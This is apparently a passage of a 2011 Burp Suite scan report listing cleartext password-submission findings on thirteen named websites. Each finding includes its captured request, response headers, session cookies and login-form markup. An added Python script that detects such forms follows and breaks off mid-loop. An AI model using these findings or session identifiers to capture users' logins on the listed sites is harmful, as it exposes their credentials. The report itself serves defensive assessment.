<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<!--Enables Silverlight 3 all methods functionality-->
<policy>
<allow-from http-reque
...[SNIP]...
<domain uri="*.ligatus.com"/>
...[SNIP]...
<domain uri="*.net.nl"/>
...[SNIP]...
<domain uri="*.sbs6.nl"/>
...[SNIP]...
<domain uri="*.veronicatv.nl"/>
...[SNIP]...
<domain uri="*.adverterenbijsbs.nl"/>
...[SNIP]...
<domain uri="*.ligatus.com"/>
...[SNIP]...
<domain uri="*.net.nl"/>
...[SNIP]...
<domain uri="*.sbs6.nl"/>
...[SNIP]...
<domain uri="*.veronicatv.nl"/>
...[SNIP]...
<domain uri="*.adverterenbijsbs.nl"/>
...[SNIP]...

6. Cleartext submission of password
There are 13 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the Secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://forum.mailsite.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.mailsite.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: forum.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: No-Store
Date: Sun, 15 May 2011 13:08:45 GMT
Pragma: no-cache
Content-Type: text/html
Expires: Fri, 13 May 2011 13:08:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: WWF=LV=2011%2D05%2D15+06%3A08%3A45&SID=91c253bba5zz3cea9fd1zzb1e9ca3e33; expires=Tue, 15-May-2012 13:08:44 GMT; path=/
Set-Cookie: ASPSESSIONIDQQDRABTC=PIHBGCODEMAPJLAMMMEDLLPO; path=/
Vary: Accept-Encoding
Content-Length: 7548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...
<td align="right" class="smText">
<form method="post" name="frmLogin" id="frmLogin" action="login_user.asp">Quick Login
<input type="text" size="10" name="name" id="name" style="font-size: 10px;" />
<input type="password" size="10" name="password" id="password" style="font-size: 10px;" />
<input type="hidden" name="NS" id="NS" value="1" />
...[SNIP]...

6.2. http://www.ekkows.0479228880.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekkows.0479228880.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.ekkows.0479228880.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ekko.ws/

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:25:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: osCsid=b3496b3cc35f9f20c355233ce2de654f; path=/ekkows/; domain=0479228880.com
Content-Type: text/html
Content-Length: 47977

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="fr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>eKKo sHop</title>
<bas
...[SNIP]...
<td align="left" class="boxText">        
       <form name="login" action="login.php?action=process" method="post">
            <center>
...[SNIP]...
<font size="1" class="smallText"> <input type="password" maxLength="40" value name="password" size="12"></b>
...[SNIP]...

6.3. http://www.host7x24.com/auth/login.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.host7x24.com
Path:   /auth/login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.host7x24.com/auth/login.php

The form contains the following password field:

password

Request

GET /auth/login.php?PHPSESSID=cbfdc595393b00a26ba316a7aa3aed04fc95f16a HTTP/1.1
Host: www.host7x24.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=cbfdc595393b00a26ba316a7aa3aed04fc95f16a; amen_sc=dea223016be9e761738f01830448b9ce

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 13:42:21 GMT
Server: Apache
Set-Cookie: PHPSESSID=cbfdc595393b00a26ba316a7aa3aed04fc95f16a; path=/; domain=.host7x24.com
Cache-Control: no-cache, must-revalidate
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 5302

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><HTML><HEAD>


<!-- PERF_LAST:: 0.014724016189575 secs -->


<!-- InstanceBeginEditable name="head" --> <!------------------
...[SNIP]...
</script>

<form name="espaceLog" method="POST" action="http://www.host7x24.com/auth/login.php">
<div class="GenericBoxLeftCorner">
...[SNIP]...
</label>
<input type="password" id="password" name="password" value="">
<p>
...[SNIP]...

6.4. http://www.internetnatrgovina.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetnatrgovina.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.internetnatrgovina.com/login.php?action=process

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.internetnatrgovina.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,43692
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:01:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.5
Set-Cookie: cookie_test=please_accept_for_session; expires=Tue, 14-Jun-2011 14:01:19 GMT; path=/; domain=internetnatrgovina.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 147000


       <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="si">
<head>

<!-- Bof products_new_glide module -->
<script type="text/javascript" src="jquery-1.2.3.pack.js">
...[SNIP]...
<td align="center" class="TextBox">
<form name="login" method="post" action="http://www.internetnatrgovina.com/login.php?action=process">
<table border="0" width="100%" cellspacing="0" cellpadding="2">
...[SNIP]...
<td align="center" class="infoBoxContents">
<input type="password" name="password" maxlength="40" size="20" value="">
</td>
...[SNIP]...

6.5. http://www.mailsite.com/portal/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mailsite.com/portal/login.asp

The form contains the following password field:

Login_Password

Request

GET /portal/ HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/download.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:06:10 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10544


<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
       <SCRIPT LANGUAGE="JavaScript">
       function popUp(URL) {
           da
...[SNIP]...
</p>
   <form name="LoginForm" action="/portal/login.asp" method="post" target="_self" ID="Form2">
                   
                   <input type="hidden" name="Login_Action" value="Process" ID="Hidden2">
...[SNIP]...
<br>
<input type="password" size="19" maxlength="20" name="Login_Password"
           
            id="Password1">

<input type="hidden" name="Login_Submit">
...[SNIP]...

6.6. http://www.mailsite.com/portal/cases/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/cases/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mailsite.com/portal/login.asp

The form contains the following password field:

Login_Password

Request

GET /portal/cases/ HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/cases/cases.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:07:15 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10544


<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
       <SCRIPT LANGUAGE="JavaScript">
       function popUp(URL) {
           da
...[SNIP]...
</p>
   <form name="LoginForm" action="/portal/login.asp" method="post" target="_self" ID="Form2">
                   
                   <input type="hidden" name="Login_Action" value="Process" ID="Hidden2">
...[SNIP]...
<br>
<input type="password" size="19" maxlength="20" name="Login_Password"
           
            id="Password1">

<input type="hidden" name="Login_Submit">
...[SNIP]...

6.7. http://www.mailsite.com/portal/cases/cases.asp

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/cases/cases.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mailsite.com/portal/login.asp

The form contains the following password field:

Login_Password

Request

GET /portal/cases/cases.asp HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/unsubscribe.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:07:08 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10544


<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
       <SCRIPT LANGUAGE="JavaScript">
       function popUp(URL) {
           da
...[SNIP]...
</p>
   <form name="LoginForm" action="/portal/login.asp" method="post" target="_self" ID="Form2">
                   
                   <input type="hidden" name="Login_Action" value="Process" ID="Hidden2">
...[SNIP]...
<br>
<input type="password" size="19" maxlength="20" name="Login_Password"
           
            id="Password1">

<input type="hidden" name="Login_Submit">
...[SNIP]...

6.8. http://www.mailsite.com/portal/download.asp

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/download.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mailsite.com/portal/login.asp

The form contains the following password field:

Login_Password

Request

GET /portal/download.asp HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmb=116582298; __utmc=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:04:24 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10544


<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
       <SCRIPT LANGUAGE="JavaScript">
       function popUp(URL) {
           da
...[SNIP]...
</p>
   <form name="LoginForm" action="/portal/login.asp" method="post" target="_self" ID="Form2">
                   
                   <input type="hidden" name="Login_Action" value="Process" ID="Hidden2">
...[SNIP]...
<br>
<input type="password" size="19" maxlength="20" name="Login_Password"
           
            id="Password1">

<input type="hidden" name="Login_Submit">
...[SNIP]...

6.9. http://www.mailsite.com/portal/unsubscribe.asp

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/unsubscribe.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mailsite.com/portal/login.asp

The form contains the following password field:

Login_Password

Request

GET /portal/unsubscribe.asp HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/portal/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:07:05 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10544


<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
       <SCRIPT LANGUAGE="JavaScript">
       function popUp(URL) {
           da
...[SNIP]...
</p>
   <form name="LoginForm" action="/portal/login.asp" method="post" target="_self" ID="Form2">
                   
                   <input type="hidden" name="Login_Action" value="Process" ID="Hidden2">
...[SNIP]...
<br>
<input type="password" size="19" maxlength="20" name="Login_Password"
           
            id="Password1">

<input type="hidden" name="Login_Submit">
...[SNIP]...

6.10. http://www.mailsite.com/portal/updateprofile.asp

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /portal/updateprofile.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mailsite.com/portal/login.asp

The form contains the following password field:

Login_Password

Request

GET /portal/updateprofile.asp HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/products/MailSite-version-9-Whats-New.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116582298.1305464376.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); ASPSESSIONIDQQDRABTC=OJGBGCODFHFMLBICHCEGNJOI; __utma=116582298.914366768.1305464376.1305464376.1305464658.2; __utmc=116582298; __utmb=116582298

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 13:06:43 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10544


<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
       <SCRIPT LANGUAGE="JavaScript">
       function popUp(URL) {
           da
...[SNIP]...
</p>
   <form name="LoginForm" action="/portal/login.asp" method="post" target="_self" ID="Form2">
                   
                   <input type="hidden" name="Login_Action" value="Process" ID="Hidden2">
...[SNIP]...
<br>
<input type="password" size="19" maxlength="20" name="Login_Password"
           
            id="Password1">

<input type="hidden" name="Login_Submit">
...[SNIP]...

6.11. http://www.mavi1.org/forum/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mavi1.org
Path:   /forum/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mavi1.org/forum/ucp.php?mode=login&sid=53ec9682a620adcaf7ec08be9021e006

The form contains the following password field:

password

Request

GET /forum/ HTTP/1.1
Host: www.mavi1.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.excelldirect.com/

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:25:50 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Set-Cookie: phpbb3_e7w4q_u=1; expires=Mon, 14-May-2012 15:25:50 GMT; path=/; domain=.mavi1.org; HttpOnly
Set-Cookie: phpbb3_e7w4q_k=; expires=Mon, 14-May-2012 15:25:50 GMT; path=/; domain=.mavi1.org; HttpOnly
Set-Cookie: phpbb3_e7w4q_sid=53ec9682a620adcaf7ec08be9021e006; expires=Mon, 14-May-2012 15:25:50 GMT; path=/; domain=.mavi1.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 53571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="tr" xml:lang="tr">

...[SNIP]...
<br clear="all" />

   <form method="post" action="./ucp.php?mode=login&amp;sid=53ec9682a620adcaf7ec08be9021e006">
   
   
   <div class="cap-div">
...[SNIP]...
</span> <input class="post" type="password" name="password" size="10" />&nbsp; <span class="gensmall">
...[SNIP]...

6.12. http://www.mmabasket.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmabasket.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://mmabasket.com/login.php?action=process&osCsid=b9cf0174de8bea0cba31cfede1d514a4

The form contains the following password field:

password

Request

GET / HTTP/1.1
Host: www.mmabasket.com
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,43678
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:04:13 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8r DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: osCsid=b9cf0174de8bea0cba31cfede1d514a4; path=/; domain=mmabasket.com
Content-Type: text/html
Content-Length: 31258


<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html dir="LTR" lang="en">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<title>MMA Clothing Silv
...[SNIP]...
<div class="news-box-top"><form name="login" action="http://mmabasket.com/login.php?action=process&osCsid=b9cf0174de8bea0cba31cfede1d514a4" method="post"><a href="http://mmabasket.com/create_account.php?osCsid=b9cf0174de8bea0cba31cfede1d514a4">
...[SNIP]...
<input type="text" onfocus="chkval(this.value)" onblur="chkval2(this.value)" class="newsletter-box" id="email" name="email_address" value="Email" /> <input name="password" id="password" onfocus="chkval3(this.value)" onblur="chkval4(this.value)" class="newsletter-box2" value="Password" type="password" /> <input type="submit" value="Submit" class="btn-red" />
...[SNIP]...

6.13. http://www.siyamiozkan.com.tr/forum/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.siyamiozkan.com.tr
Path:   /forum/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.siyamiozkan.com.tr/forum/ucp.php?mode=login&sid=641dabe7c6bc0016fc0a1a07097bedba

The form contains the following password field:

password

Request

GET /forum/ HTTP/1.1
Host: www.siyamiozkan.com.tr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.excelldirect.com/

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:25:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Set-Cookie: phpbb3_qyubt_u=1; expires=Mon, 14-May-2012 15:25:47 GMT; path=/; domain=.mavideniz1.org; HttpOnly
Set-Cookie: phpbb3_qyubt_k=; expires=Mon, 14-May-2012 15:25:47 GMT; path=/; domain=.mavideniz1.org; HttpOnly
Set-Cookie: phpbb3_qyubt_sid=641dabe7c6bc0016fc0a1a07097bedba; expires=Mon, 14-May-2012 15:25:47 GMT; path=/; domain=.mavideniz1.org; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 26318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="tr" xml:lang="tr">

...[SNIP]...
<td class="row2" height="50px" width="28%">
<form method="post" action="./ucp.php?mode=login&amp;sid=641dabe7c6bc0016fc0a1a07097bedba" style="float:left;position:relative;">    
<table width="100%" cellspacing="0">
...[SNIP]...
<input tabindex="100" class="post" type="text" name="username" size="10" />
                   
                   <input tabindex="101" class="post" type="password" name="password" size="10" />
               </td>
...[SNIP]...
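
The check behind every instance in section 6 is the same: find a form that carries a password input, resolve its action the way a browser would, and see whether the resolved URL is http://. The following script is an added example written for this page, not code from the report or from Burp. Its sample markup is trimmed from three of the responses above (6.2 ekkows, 6.3 host7x24, 6.5 mailsite); the http://shop.example control with an https:// action is constructed to show the case that is not flagged.

```python
"""Added example, not part of the Burp report above: flag forms whose password
field would be posted over clear-text HTTP, the check behind section 6.

The sample markup is trimmed from three of the responses in this section
(ekkows, host7x24, mailsite); the http://shop.example control is constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormCollector(HTMLParser):
    """Record the action and password-input names of every <form> on a page."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # html.parser lowercases tag and attribute names
        if tag == "form":
            self._current = {"action": a.get("action") or "", "password_fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() == "password":
                self._current["password_fields"].append(a.get("name") or a.get("id") or "?")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def cleartext_password_forms(page_url, html):
    """Return [(resolved action URL, [password field names])] for every form
    that has a password input and whose action resolves to an http:// URL.

    The action is resolved against the page URL the way a browser does, so a
    relative action (login.php, /portal/login.asp, ./ucp.php?...) on an
    http:// page is clear-text even though the attribute carries no scheme.
    An absolute https:// action on an http:// page is not flagged here; the
    page that carries it can still be altered in transit, which is a separate
    finding.
    """
    collector = _FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        if not form["password_fields"]:
            continue
        target = urljoin(page_url, form["action"])
        if urlsplit(target).scheme.lower() == "http":
            findings.append((target, form["password_fields"]))
    return findings


SAMPLES = {
    # trimmed from 6.2: relative action, inherits the page's http:// scheme
    "http://www.ekkows.0479228880.com/":
        '<form name="login" action="login.php?action=process" method="post">'
        '<input type="password" maxLength="40" value name="password" size="12">'
        '</form>',
    # trimmed from 6.3: absolute http:// action
    "http://www.host7x24.com/auth/login.php":
        '<form name="espaceLog" method="POST" action="http://www.host7x24.com/auth/login.php">'
        '<input type="password" id="password" name="password" value=""></form>',
    # trimmed from 6.5: root-relative action
    "http://www.mailsite.com/portal/":
        '<form name="LoginForm" action="/portal/login.asp" method="post">'
        '<input type="password" size="19" maxlength="20" name="Login_Password" id="Password1">'
        '</form>',
    # constructed control: posting to https:// from an http:// page is not flagged
    "http://shop.example/":
        '<form action="https://shop.example/login" method="post">'
        '<input type="password" name="password"></form>',
}


def scan_samples():
    """Run the check over SAMPLES; returns {page_url: findings}."""
    return {url: cleartext_password_forms(url, html) for url, html in SAMPLES.items()}


if __name__ == "__main__":
    for url, findings in scan_samples().items():
        for action, fields in findings:
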